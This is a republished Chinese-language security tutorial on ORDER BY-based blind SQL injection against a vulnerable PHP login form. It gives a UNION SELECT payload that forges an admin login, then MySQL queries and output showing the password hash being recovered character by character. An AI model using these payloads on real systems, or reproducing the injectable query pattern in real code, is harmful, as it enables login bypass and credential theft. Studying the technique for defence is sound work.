碼上歡樂
相關內容    簡體    繁體

利用order by 進行盲注

本文轉載自   查看原文   2017-10-21 07:02   1613    sql注入及防御技術

0x01 利用場景

登錄代碼:

$username = $_POST['username'];
$password = $_POST['password'];
if(filter($username)){
    //過濾括號
}else{
    $sql="SELECT * FROM admin WHERE username='".$username."'";
    $result=mysql_query($sql);
    @$row = mysql_fetch_array($result);
    if(isset($row) && $row['username'] === 'admin'){
        if ($row['password']===md5($password)){
            //Login successful
        }else{
            die("password error!");
        }
    }else{
        die("username does not exist!");
    }
}

有下列表:

mysql> select * from admin where username='admin';
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
1 row in set (0.00 sec)

這樣一個一般的場景,用戶登錄時,用戶名錯誤提示:用戶名錯誤,用戶名正確密碼錯誤提示:密碼錯誤

0x02 UNION SELECT登錄

看到這個邏輯第一想法肯定是直接利用union select偽造密碼登錄:

username=' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b&password=1

mysql> select * from admin where username='' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b';
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | c4ca4238a0b923820dcc509a6f75849b |
+----+----------+----------------------------------+
1 row in set (0.00 sec)

但是想得到password怎么辦

0x03 利用order by起飛

由登錄提示可獲取一個bool條件,如何用order by利用這個bool條件

mysql> select * from admin where username='' or 1 union select 1,2,'5' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | 2        | 5                                |
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

mysql> select * from admin where username='' or 1 union select 1,2,'6' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
|  1 | 2        | 6                                |
+----+----------+----------------------------------+
2 rows in set (0.01 sec)

mysql> select * from admin where username='' or 1 union select 1,2,'51' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | 2        | 51                               |
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

mysql> select * from admin where username='' or 1 union select 1,2,'52' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
|  1 | 2        | 52                               |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

通過逐位判斷便可得到password

顯然此方法在實際中使用的不多,但在一些特定的環境中也許會用到,比如實驗環境,如果過濾了括號,其他盲注基本上就是廢了,便可利用order by進行注入。

 

著作權歸作者所有。
商業轉載請聯系作者獲得授權,非商業轉載請注明出處。
作者:p0
鏈接:http://p0sec.net/index.php/archives/106/
來源:http://p0sec.net/


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 利用dnslog進行sql盲注 利用DNS日志進行MySQL盲注 mysql order by基於時間的盲注 CTF-sql-order by盲注 DNSlog平台各種利用姿勢(盲注) 盲注 時間盲注 sql注入——盲注 sql盲注講解 sql盲注語法
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM